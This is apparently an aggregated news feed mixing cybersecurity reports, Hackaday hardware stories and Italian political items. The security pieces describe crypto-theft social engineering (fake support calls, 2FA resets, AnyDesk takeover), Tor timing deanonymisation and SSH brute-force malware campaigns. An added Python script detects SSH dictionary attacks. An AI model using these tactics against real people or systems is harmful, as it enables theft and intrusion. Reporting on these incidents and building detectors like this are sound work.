This is how Europol dismantled Ghost, organised crime's cyber platform
It was called Ghost, and it was an encrypted communication platform for criminals believed to be unbreakable. At least until yesterday.
Some clarifications on Israel's attack on Hezbollah by means of exploding pagers
We use the latest available information on the sophisticated cyber-physical operation conducted by Israel's Unit 8200 against Hezbollah to clear up some doubts and clarify what may have happened. This operation
TPI Fest 2024: the story of the third evening through its most significant images | PHOTOS
From Giuseppe Conte to Francesco Boccia to Michele De Pascale: these are just some of the guests who animated the third evening of TPI Fest 2024, the festival of The Post Internazionale, held for the third consecutive year at the “Tettoia Nervi” in Piazza Lucio Dalla, in
There’s No Lower Spec Linux Machine Than This One
It’s not uncommon for a new distro version to come out, and a grudging admission that maybe a faster laptop is on the cards. Perhaps after seeing this project though, you’ll never again complain about that two-generations-ago 64-bit multi-core behemoth, because [Dimitri Grinberg] — who else! — has succeeded in booting an up-to-date Linux on the real most basic of processors. We’re not talking about 386s, ATmegas, or 6502s, instead he’s gone right back to the beginning. The Intel 4004 was the first commercially available microprocessor back in 1971, and now it can run Linux.
So, given the 4004’s very limited architecture and 4-bit bus, how can it perform this impossible feat? As you might expect, the kernel isn’t being compiled to run natively on such ancient hardware. Instead he’s achieved the equally impossible-sounding task of writing a MIPS emulator for the venerable silicon, and paring back the emulated hardware to the extent that it remains capable given the limitations of the 1970s support chips in interfacing to the more recent parts such as RAM for the MIPS, an SD card, and a VFD display. The result is shown in the video below the break, and even though it’s sped up it’s clear that this is not a quick machine by any means.
We’d recommend the article as a good read even if you’ll never put Linux on a 4004, because of its detailed description of the architecture. Meanwhile we’ve had a few 4004 stories over the years, and this one’s not even the first time we’ve seen it emulate something else.
Humanoid Robots Conquer Restaurants! What future awaits restaurant workers?
For the first time, the Beijing Municipal Administration for Market Regulation has issued a licence for humanoid robots to work in food-service establishments. This decision definitively opens a new chapter in the history of the restaurant business.
The pioneer was EncoSmart, a company specialising in the development of robotic systems. Its Lava series models will now be able to work the stoves in bars and restaurants across the Chinese capital.
EncoSmart's Lava Iron
EncoSmart's Lava Iron robots are able to prepare a range of appetising snacks. Their signature dish is golden fries, which they can fry in just two minutes. The mechanical chefs have also learned the art of preparing crispy chicken wings and other popular snacks. What is particularly pleasing is that the system improves constantly, autonomously mastering new recipes.
According to its creators, one of the main advantages of the Lava robots is their ability to precisely identify ingredients and calculate the ideal cooking time for each product. This was made possible by advanced visual-perception technology.
Although robot chefs are only just beginning to appear in the Middle Kingdom, EncoSmart founder and CEO Chen Zhen is confident about their bright future. In his view, the rapid development of the technology and the size of the Chinese restaurant market will create the ideal conditions for improving the androids' culinary skills.
“Our main task now is to accumulate as much data as possible on the various scenarios in which robots are used in the kitchen. This will help us catch up with and overtake our main competitors from Europe and the United States,” Chen said in an interview with Beijing News.
The decision to issue the licence is part of a large-scale government programme to accelerate the introduction of humanoid robots into traditional sectors of the economy. At the recent World Robot Conference held in the Chinese capital, the public was impressed by domestic developments: robots able to arrange goods on shelves, dispense medicines in pharmacies and even do housework.
Image from the World Robot Conference
EncoSmart, founded in spring 2022, has already managed to attract the attention of major investors. Last April the startup received substantial funding of 40 million RMB (about 5.6 million dollars). The lead sponsor was ZhenFund, and other participants included well-known players such as Decent Capital and the venture-capital arm of Joyoung, one of the country's leading appliance manufacturers.
The appearance of robot chefs in Beijing establishments could be the start of a culinary revolution. It will not only speed up cooking and increase the efficiency of food service, but also open new horizons for gastronomic experimentation. The question remains, though: how will diners react to food prepared by machines? And, above all, what future awaits the people who have spent years mastering the intricacies of the profession?
Uncle Sam Is in Danger! White House data published on Breach Forums
Recently, a threat actor on an underground forum published an alleged data breach concerning WhiteHouse[.]gov. The post, made by a user named “l33tfg”, claims that sensitive information from the official White House website has been exposed. According to the claim, the data includes emails, names, phone numbers, hashes and IP addresses.
At the moment we cannot confirm the veracity of the news, as the organisation has not yet released any official press statement on its website regarding the incident. This article should therefore be treated as an “intelligence source”.
Details of the alleged breach
In the forum post the actor provided a sample of the compromised data, claiming it comes directly from the WhiteHouse.gov domain. The post specifies that the full breach includes sensitive details such as email addresses, phone numbers, hashes and IP addresses. A link is also provided to what is described as the “FULL LEAK”.
Although we will not disclose any sensitive information in this article, it is worth noting that the shared data appears authentic, based on the formatting and structure typical of compromised records.
About the threat actors' target
WhiteHouse.gov is the official website of the White House and a crucial digital resource for the executive branch of the United States government. The site holds a vast amount of public information and serves as a communication platform for the government. The organisation that runs the site is accountable to various stakeholders, including citizens, journalists and policymakers. Given the high-profile nature of the institution, any compromise could have wide-ranging consequences.
Implications of the breach
If the alleged breach were genuine, the exposure of data such as emails, phone numbers and IP addresses could raise serious security concerns. For example, it could pave the way for further phishing attacks aimed at government officials or other personnel associated with the White House. Furthermore, the exposure of hashed passwords or other forms of authentication could allow threat actors to gain unauthorised access to restricted areas of the network, potentially leading to more serious compromises of government data.
The leak could also damage public trust in the institution, particularly if sensitive or classified information were revealed. Cybercriminals and state actors could exploit such information for intelligence activities or malicious actions.
Conclusion
RHC Dark Lab will follow developments and publish further news on the blog should there be substantial updates. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower's encrypted email.
This article was written on the basis of public information not yet verified by the respective organisations. We will update our readers as soon as further details become available.
Digital Walls: The 10 most popular online services that Russia has blacked out
Notion, one of the best-known and most popular productivity tools, has announced its definitive withdrawal from the Russian market, effective 9 September. The company will close all workspaces and accounts of Russian users because of the strict restrictions on software services imposed by the US government, which have made its operations in Russia impossible.
This development highlights the enormous challenges that global internet services face because of national regulations and international sanctions.
The 10 main online services banned from Russia
- Notion: The well-known productivity tool will close Russian users' workspaces and accounts from 9 September 2024.
- Facebook: Banned in 2022 for failing to comply with the Russian government's censorship rules, accused of spreading “disinformation”.
- Signal: This secure messaging app was banned in August 2024 for violating anti-terrorism and anti-extremism laws.
- Twitter: After restrictions that began in 2021, Twitter was completely blocked in 2022 for failing to remove content deemed “illegal”.
- Telegram: Banned from 2018 to 2020 for failing to hand encrypted data over to the Russian authorities; although the ban was lifted, the platform remains under close supervision.
- LinkedIn: Blocked since 2016 for failing to comply with the laws on localisation of Russian citizens' data.
- Zoom: Although not completely banned, its use in Russia was restricted and monitored in 2022, especially for matters relating to government and critical infrastructure.
- ProtonVPN: Banned in 2020 and recently removed from the Russian App Store together with other VPN providers for failing to comply with data-storage regulations.
- Google Docs: Although not completely blocked, Google Docs faced partial restrictions in 2022 for the spread of uncensored content.
- Spotify: Withdrew from the Russian market in 2022 because of the strict censorship of content on the platform.
These blocks highlight the growing concern over the difficulties global services face in navigating intricate international regulations and sanctions.
The situation shows how fragile access to essential tools is in a global context that is increasingly regulated and complex, as well as fractured by conflicts and economic influences.
Security Weekly 16-20/9/24: updates, threats and operations
Happy Saturday and welcome back, dear cyber User.
Welcome to our weekly update on the cyber landscape. This week German law enforcement carried out major operations against cybercrime, dismantling the infrastructure of the Vanir Locker ransomware group and shutting down 47 cryptocurrency exchanges used for money laundering.
These actions included the seizure of a data leak site, preventing the publication of stolen data and redirecting users to an information page on the deceptive activities of the exchanges involved. In another global operation, called Operation Kaerb, a criminal network that used the iServer platform for automated phishing attacks was dismantled, affecting 483,000 victims worldwide and leading to the arrest of 17 suspects.
CISA and the FBI issued a “Secure by Design” alert urging software manufacturers to reconsider their practices, in response to the prevalence of cross-site scripting (XSS) vulnerabilities. The alert provides principles and concrete actions for eliminating these vulnerabilities during the design and development phases.
Another operation led to the takedown of a vast Chinese botnet called Raptor Train, which targeted critical infrastructure in the United States and other countries, infecting more than 260,000 devices. The botnet was linked to Chinese state-sponsored criminals.
On the ransomware front, the Vanilla Tempest group targeted the US healthcare sector using INC ransomware. Meanwhile, cybercriminals are exploiting GitHub to spread Lumma Stealer through fake vulnerability reports and phishing notices.
Recent attacks also saw North Korean hackers using the RustDoor malware on LinkedIn, while Binance warned users about a rise in clipper malware attacks that steal sensitive cryptocurrency wallet data.
Finally, a sophisticated campaign targeted attendees of the US-Taiwan Defense Industry Conference with malicious ZIP archives, while a malware called StealC locked users in kiosk mode to steal Google credentials.
These events highlight the growing complexity and danger of global cyber threats and the importance of proactive cybersecurity.
😋 FunFact
Today's fun fact is curious to say the least: a program written in Go that obfuscates the code of PowerShell scripts, making analysis and detection much harder. Five levels of obfuscation, up to fragmentation of the script.
That's all for today too; thank you for the time and attention you have given me. Wishing you a good weekend, I refer you to my blog and to next week for a new appointment with NINAsec.
Get Your Lisp On With The Dune Shell
Lisp is one of those programming languages that seems to keep taunting us for not learning it properly. It is still used for teaching functional languages today. [Adam McDaniel] has an obvious fondness for this fifty-year-old language and has used it in several projects, including their own shell, Dune.
Dune is a shell designed for powerful scripting. Think of it as an unholy combination of bash and Lisp.
Dune is designed to be highly customisable, allowing you to create a super-optimised workstation for your admin and programming tasks. [Adam] describes the front end for Dune as having turned up the cosiness dial to eleven, and we can see that. A cosy home is personalised, and Dune lets you customise everything.
Dune is a useable functional programming environment with a reasonably complete standard library to back it up, which should simplify some of the more complicated sysadmin tasks. [Adam] says the language also supports a few metaprogramming concepts, such as a quote operator, operator overloading, and macro programming. It’s difficult to describe much more about what you can do with Dune, as it’s a general-purpose programming language wrapped in a shell. The possibilities are endless, and [Adam] is looking forward to seeing what you lot out there do with his project!
The shell can be personalised by editing the prelude file, which allows you to overload functions for the prompt text, the incomplete prompt text (so you can implement intelligent completion options), and a function that deals with the formatting of the command response text. [Adam] gives us his personal prelude file, which defines many helper functions displaying useful things such as the current weather, a calendar, and an ASCII art cat. You never know when that might come in handy. This file is written in Lisp, so we reckon that’s where many people will start as they come up the Lisp (re)learning curve before embarking on more involved automation. Dune was written in Rust, so you need that infrastructure to install it with Cargo.
As we said earlier, Lisp is not a new language. We found a hack for porting a Lisp interpreter to any old language and also running Lisp bare metal on a Lisp machine. Finally, [Al] takes a look at some alternative shells.
Amateur Astronomer Images Spy Satellite
As anyone who’s looked at the sky just before dawn or right after dusk can confirm, for the last seventy years or so there have been all kinds of artificial satellites floating around in low-Earth orbit that are visible to the naked eye. Perhaps the most famous in the last few decades is the International Space Station, but there are all kinds of others up there from amateur radio satellites, the Starlink constellation, satellite TV, and, of course, various spy satellites from a few of the world’s governments. [Felix] seems to have found one and his images of it can be found here.
[Felix] has been taking pictures of the night sky for a while now, including many different satellites. While plenty of satellites publish their paths to enable use, spy satellites aren’t generally public record but are still able to be located nonetheless. He uses a large Dobsonian telescope to resolve the images of several different satellites speculated to be spy satellites, with at least one hosting a synthetic aperture radar (SAR) system. His images are good enough to deduce the size and shape of the antennas used, as well as the size of the solar panels on board.
As far as being concerned about the ramifications of imaging top-secret technology, [Felix] is not too concerned. He states that most rival governments are likely able to observe these satellites with much more powerful telescopes than he has, so nothing he has published so far is likely to be a surprise to anyone. Besides, these aren’t exactly hidden away, either; they’re up in the sky for anyone to see. If you want to take a shot at that yourself, you can build a Dobsonian-like telescope mostly from Ikea parts, and use a bit of off-the-shelf electronics to point it at just the right position too.
Mechanical Logic Gates With Amplification
One of the hardest things about studying electricity, and by extension electronics, is that you generally can’t touch or see anything directly, and if you can you’re generally having a pretty bad day. For teaching something that’s almost always invisible, educators have come up with a number of analogies for helping students understand the inner workings of this mysterious phenomenon like the water analogy or mechanical analogs to electronic circuits. One of [Thomas]’s problems with most of these devices, though, is that they don’t have any amplification or “fan-out” capability like a real electronic circuit would. He’s solved that with a unique mechanical amplifier.
Digital logic circuits generally have input power and ground connections in addition to their logic connection points, so [Thomas]’s main breakthrough here is that the mechanical equivalent should as well. His uses a motor driving a shaft with a set of pulleys, each of which has a fixed string wrapped around the pulley. That string is attached to a second string which is controlled by an input. When the input is moved, the string on the pulley moves as well, but the pulley adds a considerable amount of power to the output, which can eventually be used to drive a much larger number of inputs. In electronics, the ability to drive a certain number of inputs from a single output is called “fan-out”, and this device has an equivalent fan-out of around 10, meaning each output can drive ten inputs.
[Thomas] calls his invention capstan lever logic, presumably named after a type of winch used on sailing vessels. In this case, the capstan is the driven pulley system. The linked video shows him creating a number of equivalent circuits starting with an inverter and working his way up to a half adder and an RS flip-flop. While the amplifier pulley does take a minute to wrap one’s mind around, it really helps make the equivalent electronic circuit more intuitive. We’ve seen similar builds before as well which use pulleys to demonstrate electronic circuits, but in a slightly different manner than this build does.
The Walls Are Closing in on the Snowflake Hacker
As security researchers circle around Judische, and authorities take down his servers, how much longer will a hacker responsible for breaching Ticketmaster, AT&T, and many more companies remain free?
Joseph Cox (404 Media)
Giuseppe Conte at TPI Fest 2024: “One of the most infamous pages in history is being written in Gaza. In Europe the M5S will always be a builder of peace”
“One of the most infamous pages in history is being written in Gaza, and our government cannot remain silent in the face of all this, otherwise it is complicit”: so declared the president of the Movimento 5 Stelle, Giuseppe Conte, on stage
Raspberry Pi RP2350-E9 Erratum Redefined as Input Mode Leakage Current
Although initially defined as an issue with GPIO inputs when configured with the internal pull-downs enabled, erratum RP2350-E9 has recently been redefined in the datasheet (page 1341) as a case of increased leakage current. As now understood, and as we previously reported, the issue occurs when a GPIO (0 – 47) is configured as an input, the input buffer is enabled and the pad voltage sits somewhere between logic LOW and HIGH. In that case the leakage current can be as high as 120 µA with IOVDD = 3.3 V. This leakage current is too much for the internal pull-up to overcome, hence the need for an external pull-down (8.2 kΩ or less, per the erratum). Disabling the input buffer stops the leakage current, but reading the input requires re-enabling the buffer.
GPIO Pad leakage for IOVDD=3.3 V (Credit: Raspberry Pi)
The upshot of this issue is that for input applications, the internal pull-downs are useless, and since PIO applications cannot toggle pad controls the input buffer toggling workaround is not an option. ADC usage requires one to clear the GPIO input enable. In general any circuit that relies on floating pins or an internal pull-down resistor will be affected.
Although this should mean that the affected A2 stepping of the RP2350 MCU can still be used for applications where this is not an issue, and external pull-downs can be used as a ‘fix’ at the cost of extra power usage, it makes what should have been a drop-in replacement a troubled chip at best. At this point there have still been no definite statements from Raspberry Pi regarding a new (B0) stepping, leaving RP MCU users with the choice between the less flashy RP2040 and the buggy RP2350 for the foreseeable future.
Header: Thomas Amberg, CC BY-SA 2.0.
Michele De Pascale at TPI Fest 2024: “The flood in Emilia-Romagna? Fratelli d’Italia has decided to wage a battle against a territory”
“Fratelli d’Italia has decided to wage a battle against Emilia-Romagna”: so declared Michele De Pascale, mayor of Ravenna and the centre-left candidate in the Emilia-Romagna regional elections, on the stage of the TPI
Francesco Boccia at TPI Fest 2024: “The words of Musumeci and Bignami on the flood in Emilia-Romagna are out of place; they lack a sense of the institutions”
“The words of Musumeci and Bignami on the flood in Emilia-Romagna are out of place; they lack a sense of the institutions”: so declared Partito Democratico senator Francesco Boccia at TPI Fest 2024. The former
Fixing an Elgato HD60 S HDMI Capture Device
There’s a special kind of satisfaction found in the act of repairing a previously broken device, which is why YouTube is full of repair channels and guides on how to do it yourself. Inspired by this, [Doug Brown] decided to give it a shot himself, with an Elgato HD60 S HDMI capture device as the patient. As per the eBay listing, the device did not show up as a USB device when connected to a computer — a quick probing of the innards revealed that not only were the board voltages being dragged down, but some of the components on the PCB were getting suspiciously hot.
One of the broken switching regulators on the Elgato HD60 S capture device PCB. (Credit: Doug Brown)
On a thermal camera the hot components in question turned out to be part of the voltage regulator circuits: one a switching regulator (marked fiVJVE, a Fitipower FP6373A) and the other a voltage inverter marked PFNI (TI TPS60403DBV).
Since both took 5 V, the suspicion was an over-voltage event on the USB side. After replacing the FP6373A and TPS60403 with newly purchased ones, the voltage rails were indeed healthy, and the Elgato sprung to life and could be used for HDMI capture and pass-through. However, the device’s onboard LEDs stubbornly refused to follow the boot-up pattern or show any other color patterns. Was this just a busted Innotech IT1504 LED driver IC?
Swapping it with a pin-compatible Macroblock MB15040 didn’t improve the situation, and the LEDs worked fine when externally controlling the MB15040 on its SPI bus, as well as with the original IT1504. Asking Elgato whether there was a known issue with these status LEDs didn’t lead to anything, so [Doug] decided to tackle the presumed source of the problem: the Nuvoton M031LD2AE MCU that’s supposed to drive the LED driver IC. The PCB helpfully provides a 4-pin JST connector on the board for the MCU’s SWD interface, but Elgato did protect the flash contents, so a straight dump wasn’t going to work.
The binary firmware is however helpfully available from Elgato, with the MCU already running the latest version. This is the point where [Doug] loaded the firmware into Ghidra to begin to understand what exactly this firmware was supposed to be doing. Putting on a fresh MCU with the correct firmware definitely worked, but debugging was hard as the new MCU also enabled protections, so in Ghidra the offending code for this was identified and neutralized, finally allowing for on-chip debugging and leading down another rabbit hole only to find an SPI flash chip at the end.
Ultimately it turned out that all the hardware was working fine. The problem ended up being that the LED patterns stored on the SPI EEPROM had become corrupted, which caused the Nuvoton MCU to skip over them. The same issue was confirmed on a second HD60 S, which makes it seem that this is a common issue with these Elgato capture devices. As a next step [Doug] hopes to figure out a way to more easily fix this issue, as even the streamlined process is still quite convoluted. Whether it is an issue with Elgato’s software or firmware (updater) is unknown at this point, but at least there seems to be a fix for now, even if Elgato support seems to just tell owners to ‘ignore it if capturing works’.
There’s nothing quite as inspirational as reading about a successful repair. If you need another shot of endorphins, check out the work [BuyItFixIt] put into a video baby monitor to bring it back online.
Is Tor really secure? How a user was unmasked with a timing attack!
The developers of the Tor project have assured users that the Tor browser and the Tor network are still secure. The reason is that information recently appeared online that law enforcement in Germany and other countries are working together to deanonymise users using timing attacks.
Recently, a joint report by the German publication Panorama and the investigative YouTube channel STRG_F revealed that the German Federal Criminal Police Office (BKA) and the Frankfurt public prosecutor’s office managed to identify at least one Tor user. The report mentions “timing analysis” as the key to the deanonymisation.
“Based on the timing of individual packets, anonymous connections can be traced back to a specific Tor user, even though connections in the Tor network are encrypted multiple times,” the journalists report, without explaining exactly how the technique works.
In theory, long-term observation of certain trends, as suggested by the timing-analysis methodology, could indeed give observers some clues about the users sending traffic into the network.
In essence, someone can add their own nodes to the Tor network and record the times at which packets enter and leave the network. After some time, based on the timing data collected, it would be possible to determine who is connecting to a particular .onion service.
At the same time, Matthias Marx, a representative of the well-known hacker community Chaos Computer Club (CCC), confirmed to the media that the available evidence (documents and other information gathered by the journalists) “shows that law enforcement has repeatedly and successfully carried out attacks against individual users for the purpose of deanonymisation.”
In response to the report, the Tor team wrote on its blog that anyone using the latest versions of the Tor project’s tools is safe, and that timing attacks are a known technique for which effective defences have long existed.
The Tor Project notes that it has not seen all the documents (although it has requested them from the journalists), but believes the German police were able to identify a specific Tor user because he was using outdated software, not because law enforcement exploited an unknown vulnerability or found an effective use of timing attacks.
According to the German researchers, a timing attack was used during the investigation of a person known as Andres G. Law enforcement considered him the operator of the Boystown site, which published child sexual abuse material (CSAM), i.e., child pornography.
Andres G. is presumed to have used the anonymous messenger Ricochet, which relays data between sender and recipient via Tor. He is also presumed to have used a version that could not protect his Tor connections from deanonymisation through timing attacks such as the one used by the police.
The German authorities reportedly enlisted the help of the operator Telefónica, which provided data on all O2 customers connecting to the known Tor node. Cross-referencing this information with the timing-analysis data allowed the authorities to identify Andres G., who was eventually arrested, charged, convicted and imprisoned in 2022.
Tor’s developers write that the method described is unlikely to indicate a vulnerability in Tor.
L'articolo Tor è davvero sicuro? Come è stato Smascherato un Utente con un attacco temporale! proviene da il blog della sicurezza informatica.
When luxury becomes malware! Hackers steal $230 million but are betrayed by their wild spending
Two suspects were arrested this week in Miami, accused of conspiring to steal and launder more than $230 million in cryptocurrency using cryptocurrency exchanges and mixing services. The two men are Malone Lam, 20, alias "Greavys", "Anne Hathaway" and "$$$", and Jeandiel Serrano, 21, alias "Box", "VersaceGod" and "@SkidStar". Both defendants were arrested by FBI agents on Wednesday evening and appeared in court the following day.
According to the case file, on August 18 Lam, Serrano and their accomplices successfully carried out an attack in which they stole more than 4,100 Bitcoin from a victim in Washington, DC. At the time, the value of the stolen assets exceeded $230 million. According to the investigation, the attackers gained unauthorized access to the victim's crypto accounts and transferred the funds to their own crypto wallets, then laundered the stolen assets.
To conceal their activity, the suspects used a combination of methods: cryptocurrency mixers, exchanges, transaction chains and pass-through wallets. Virtual private networks (VPNs) were also used to hide their identities and locations. These schemes allowed the fraudsters to operate undetected until they were exposed by operational security mistakes and multiple expensive purchases.
The investigation revealed that the stolen cryptocurrency was used to fund the suspects' lavish lifestyle. They spent the money on international travel, expensive cars, luxury watches, designer handbags and nightclub entertainment in Los Angeles and Miami.
An investigation by cryptocurrency fraud specialist ZachXBT helped identify a third alleged participant in the scheme, known by the pseudonym "Wiz". According to the expert, the group used fake phone numbers and impersonated employees of Google and of the support service of the cryptocurrency exchange Gemini to access the victims' accounts. In one case, they convinced the victim to reset two-factor authentication and hand over control of his screen via the AnyDesk remote access application, which allowed them to steal private keys and drain funds from the crypto wallets.
According to ZachXBT, initial tracing showed that the stolen $243 million was split among the group's members and then moved through more than 15 exchanges. The funds were converted between various cryptocurrencies, including Bitcoin, Litecoin, Ethereum and Monero, making them difficult to trace.
Despite their efforts to cover their tracks, investigators found that a cluster of Ethereum addresses linked to Serrano and Wiz had received more than $41 million from two cryptocurrency exchanges in recent weeks. Mistakes in the money-laundering process, including the careless use of a screen during a transaction in which Wiz accidentally revealed his real name, led to his exposure.
Investigators also found that a significant portion of the funds was converted into Monero to increase anonymity, but errors in the transactions made it possible to link the laundered funds to the amounts originally stolen. This helped investigators track down the suspects, which ultimately led to the arrests.
The FBI managed to arrest Lam and Serrano by analyzing their lavish spending and their social media activity, where their friends accidentally revealed their locations in Los Angeles and Miami. The case remains under investigation, and law enforcement has not ruled out further arrests.
The article When luxury becomes malware! Hackers steal $230 million but are betrayed by their wild spending originally appeared on il blog della sicurezza informatica.
Center-left, the road to the alliance is already mapped out: here's why
@Politica interna, europea e internazionale
If we were to ask what Silvio Berlusconi's greatest legacy to politics was, the answer might well be: the Italian center-right. Not so much because he is credited with building a political area that had effectively not existed during the First Republic, but for having
Hackaday Podcast Episode 289: Tiny Games, Two Modern Modems, and the Next Big Thing
This week on the Podcast, Hackaday’s Elliot Williams and Kristina Panos joined forces to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.
First up in the news: we’ve announced the 2024 Tiny Games Contest winners! We asked you to show us your best tiny game, whether that means tiny hardware, tiny code, or a tiny BOM, and you did so in spades. Congratulations to all the winners and Honorable Mentions, and thanks to DigiKey, Supplyframe, and all who entered!
We also announced the first round of Supercon speakers, so if you haven’t gotten your ticket yet, now’s the second best time.
But wait, there’s more! We’re already a few weeks into the next contest, where we want you to show us your best Simple Supercon Add-On. We love to see the add-ons people make for the badge every year, so this time around we’re really embracing the standard. The best SAOs will get a production run and they’ll be in the swag bag at Hackaday Europe 2025.
Then it’s on to What’s That Sound, which completely stumped Kristina once again. Can you get it? Can you figure it out? Can you guess what’s making that sound? If you can, and your number comes up, you get a special Hackaday Podcast t-shirt.
Now it’s on to the hacks, beginning with non-planar ironing for smooth prints, and a really neat business card that also plays tiny games. Then we’ll discuss USB modems, cool casts for broken wrists, and archiving data on paper. Finally, we ask two big questions — where do you connect the shield, and what’s the Next Big Thing gonna be? Inquiring minds want to know.
Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
Download in DRM-free MP3 and savor at your leisure.
Where to Follow Hackaday Podcast
Episode 289 Show Notes:
News:
- 2024 Hackaday Superconference Speakers, Round One
- Supercon 2024: May The Best Badge Add-Ons Win
- Meet The Winners Of The 2024 Tiny Games Contest
What’s that Sound?
- Know that sound? Submit your answer for a chance at a Hackaday Podcast T-Shirt.
Interesting Hacks of the Week:
- Non-planar Ironing Makes Smooth Prints
- GitHub – mfx-inria/curvislicer: CurviSlicer: Slightly curved slicing for 3-axis printers
- 3D Printering: Non-Planar Layer FDM
- A Universal, Non-planar Slicer For 3D Printing Is Worth Thinking About
- 3D Printing 90° Overhangs With Non-Planar Slicing
- Full Printing Path Control Without Writing GCode
- 2024 Tiny Games Contest: Neat PCB Business Card Was Inspired By The Arduboy
- A Brand New USB Modem In The 2020s
- Cast21 Brings Healing Into 2024
- Archiving Data On Paper Using 2D Images
- Back Up Your Data On Paper With Lots Of QR Codes
- Color Can Triple QR Code Capacity
- Barcodes Enter The Matrix In 2027
- An Espresso Machine For The DIY Crowd
Quick Hacks:
- Elliot’s Picks:
- Ferrites Versus Ethernet In The Ham Shack
- Thermal Runaway: Solving The Bane Of Electric Vehicles
- Microwave Forge Casts The Sinking-est Benchy Ever
- Kristina’s Picks:
- Recreating A Popular Faux-Nixie Clock
- Pong In A Petri Dish: Teasing Out How Brains Work
- Create Custom Gridfinity Boxes Using Images Of Tools
Can’t-Miss Articles:
Mobbing and stressful working environments: the PD considers an amendment to extend protection to self-employed workers
@Politica interna, europea e internazionale
The InOltre Alternativa Progressista association proposes working on a joint amendment by the opposition parties to modify Law 81/2017, with the aim of extending the protection provided for by Article 2087
Inviting the Public to Take Stereo Photos for Science
[Lynnadeng]’s team wanted to monitor the Los Angeles River over time and wanted citizen scientists — or anyone, for that matter — to help. They built a dual phone holder to allow random passersby to use their phones to take photos. A QR code lets them easily send the pictures to the team. The 3D printed holder is fixed in place and has a known gap that allows stereo reconstruction from pairs of photos.
Of course, people aren’t going to know what to do, so you need a sign with instructions along with the QR code. One advantage to this scheme is that it’s cheap. All the camera hardware is in the public’s phone. Of course, you still have to make the holder robust to the elements, but that’s not nearly as difficult as supplying power and weatherproofing cameras and radios.
The really interesting part is the software. At first, we were disappointed that the post had a dead link to GitHub, but it was easy enough to find the correct one. In some cases, people will use a single camera, so 3D reconstruction isn’t always possible.
We love citizen science around here. No matter where you live, there are many opportunities to contribute.
Minister Pichetto Fratin: "We want to bring nuclear power back to Italy"
@Politica interna, europea e internazionale
Environment and Energy Security Minister Gilberto Pichetto Fratin wants to bring nuclear energy back to Italy. The minister announces the forthcoming launch of a bill to relaunch the sector through new-generation small modular reactors. Pichetto
New Attacks on Linux SSH Servers: Supershell Malware Compromises Vulnerable Systems
ASEC researchers have identified new attacks against poorly protected Linux SSH servers. In these, the attackers used the Supershell malware, written in Go. This backdoor gives attackers remote control over compromised systems.
After the initial infection, the attackers launch scanners to look for other vulnerable targets. These attacks are believed to be carried out using password dictionaries obtained from already infected servers.
The attackers use the wget, curl, tftp and ftpget commands to download and run malicious scripts. These scripts make it possible to gain full access to the system and install additional malware, then hide the traces of the attack by deleting the downloaded files.
Having installed a backdoor, the attackers can deploy hidden cryptocurrency miners such as XMRig on infected hosts, a typical attack pattern on vulnerable Linux servers. In the campaign under examination, the attackers also used Cobalt Strike to set up remote access and ElfMiner to install crypto miners.
Experts recommend that administrators harden their systems, update software regularly, use strong passwords and enable firewalls to minimize the risk of infection.
The article New Attacks on Linux SSH Servers: Supershell Malware Compromises Vulnerable Systems originally appeared on il blog della sicurezza informatica.
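The dictionary attacks described above leave a characteristic trace in the SSH server's authentication log: many failed logins from one source spread over many usernames, sometimes followed by a success. The following Python script, an added example that is not part of the original article or of the ASEC research, applies that heuristic to a few constructed auth.log lines (hostnames, addresses and thresholds are invented).

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Line shapes OpenSSH writes to auth.log / the journal (the syslog prefix is not part of the match).
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"Accepted (?:password|publickey|keyboard-interactive/pam) for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)


@dataclass
class SourceStats:
    failures: int = 0
    users: set = field(default_factory=set)
    logins_after_failures: list = field(default_factory=list)


def analyze(lines, min_failures=5, min_users=3):
    """Group SSH authentication events by source address and flag dictionary attacks.

    A source is flagged when it produced at least `min_failures` failed logins
    spread over at least `min_users` distinct usernames: a password list being
    tried against the server, not a user mistyping a password. Any successful
    login from such a source after its failures is listed as a likely takeover,
    which is the event worth paging on.
    """
    stats = defaultdict(SourceStats)
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            stats[m["ip"]].failures += 1
            stats[m["ip"]].users.add(m["user"])
            continue
        m = ACCEPTED_RE.search(line)
        if m and m["ip"] in stats and stats[m["ip"]].failures > 0:
            stats[m["ip"]].logins_after_failures.append(m["user"])

    findings = {}
    for ip, s in stats.items():
        if s.failures >= min_failures and len(s.users) >= min_users:
            findings[ip] = {
                "failures": s.failures,
                "distinct_users": len(s.users),
                "likely_compromised": list(s.logins_after_failures),
            }
    return findings


# Constructed sample log: one spraying source that finally gets in, and one ordinary user typo.
SAMPLE_LOG = """\
Sep 20 03:14:07 web1 sshd[2201]: Failed password for root from 203.0.113.45 port 51002 ssh2
Sep 20 03:14:09 web1 sshd[2203]: Failed password for invalid user admin from 203.0.113.45 port 51010 ssh2
Sep 20 03:14:11 web1 sshd[2205]: Failed password for invalid user oracle from 203.0.113.45 port 51014 ssh2
Sep 20 03:14:13 web1 sshd[2207]: Failed password for invalid user test from 203.0.113.45 port 51020 ssh2
Sep 20 03:14:15 web1 sshd[2209]: Failed password for root from 203.0.113.45 port 51033 ssh2
Sep 20 03:14:18 web1 sshd[2211]: Accepted password for root from 203.0.113.45 port 51040 ssh2
Sep 20 03:20:01 web1 sshd[2300]: Failed password for alice from 198.51.100.7 port 40122 ssh2
Sep 20 03:20:05 web1 sshd[2302]: Accepted publickey for alice from 198.51.100.7 port 40130 ssh2
"""


def analyze_sample():
    return analyze(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, info in analyze_sample().items():
        print(ip, info)
```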
This Week in Security: Open Source C2, Raptor Trains, and End to End Encryption
Open Source has sort of eaten everything in software these days. And that includes malware, apparently, with open source Command and Control (C2) frameworks like Sliver and Havoc gaining traction. And of course, this oddball intersection of Open Source and security has intrigued at least one security researcher who has found some interesting vulnerabilities.
Before we dive into what was found, you may wonder why open source malware tools exist. First off, trustworthy C2 servers are quite useful for researchers, who need access to such tools for testing. Then there is Red Teaming, where a security professional launches a mock attack against a target to test its defenses. A C2 is often useful for education and hobby level work, and then there are the true criminals that do use these Open Source tools. It takes all types.
